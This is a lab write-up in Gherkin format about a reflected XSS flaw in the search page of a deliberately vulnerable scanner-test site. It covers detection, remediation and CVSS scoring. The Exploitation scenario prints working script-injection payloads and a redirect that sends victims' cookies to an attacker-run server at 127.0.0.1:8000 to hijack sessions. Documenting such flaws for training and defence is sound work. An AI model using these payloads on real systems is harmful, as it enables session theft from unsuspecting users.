## Version 1.4.1
## language: en

Feature: Cross-Site-Scripting-Search
  TOE:
    web-scanner-test-site
  Category:
    Input Validation
  Location:
    http://www.webscantest.com/
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page Generation
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Perform a XSS attack
  Recommendation:
    Sanitize inputs that may contain special characters from the HTML syntax

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Kali Linux      | 5.4.0     |
    | Firefox         | 68.6.0esr |
    | Burp Suite CE   | v2020-1   |
    | PHP             | 7.3.15-3  |
  TOE information:
    Given that I access the site at
    """
    http://www.webscantest.com/
    """
    Then I see an index of different hacking challenges

  Scenario: Normal use case
    Given that I choose a XSS challenge under the URL
    """
    http://www.webscantest.com/crosstraining/search.php
    """
    Then I see a search bar
    When I submit a random query "Rake"
    Then I get the message
    """
    Your search for Rake had 0 results
    """

  Scenario: Static detection
    Given there is not access to the source code
    Then a static detection cannot be performed

  Scenario: Dynamic detection
    Given the search functionality described above
    When I use as a query the common payload
    """
    <script>alert('XSS')</script>
    """
    Then I get the message
    """
    Your search for <script>alert('XSS')</script> had 0 results
    """
    And I assume the special characters are being sanitized
    When I inspect the HTML of the site
    Then I notice the payload is also set in the input value
    """
    <input type="text" name="q" size="80"
      value="<script>alert('XSS')</script>">
    """
    And I decide to try a different payload
    """
    "><script>alert('XSS')</script>
    """
    And I do not get any results
    When I inspect the HTML
    """
    <input type="text" name="q" size="80"
      value="&quot;><script>alert('XSS')</script>">
    """
    Then I conclude the double quotes are sanitized there too
    Given that I used Burp to analyze the request
    And I notice the value is sent as a body parameter "q"
    When I send the previous payload as a parameter in the URL
    """
    ?q="><script>alert('XSS')</script>
    """
    Then I get an alert in the site
    And I conclude that the site is vulnerable to a XSS attack

  Scenario: Exploitation
    Given the site has a reflected XSS vulnerability
    And that I used Burp to understand how the request is made
    Then I decide to craft a malicious URL to steal a user's cookie
    And use the following value as input
    """
    ?q="><script>document.location="http://127.0.0.1:8000/getcookie.php"</script>
    """
    When I set up a simple PHP server with a script to get cookies based on
    """
    https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/
    """
    And I send the crafted URL to a user
    Then I get the cookie in a local file
    When I use Burp to go the site
    And I add the obtained cookie to my headers
    Then the site greets me with "Welcome Back TestUser"
    And I manage to hijack that user's session

  Scenario: Remediation
  Sanitize inputs that may contain special characters in the HTML syntax
    Given that the inputs are validated before constructing the HTML code
    When I use the previously successful query
    """
    "><script>alert('XSS')</script>
    """
    Then I do not get an alert box from the site

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.3/10 (Medium) - AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.0/10 (Medium) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.1/10 (High) - CR:L/IR:L/AR:L/

  Scenario: Correlations
    No correlations have been found to this date 2020-04-24
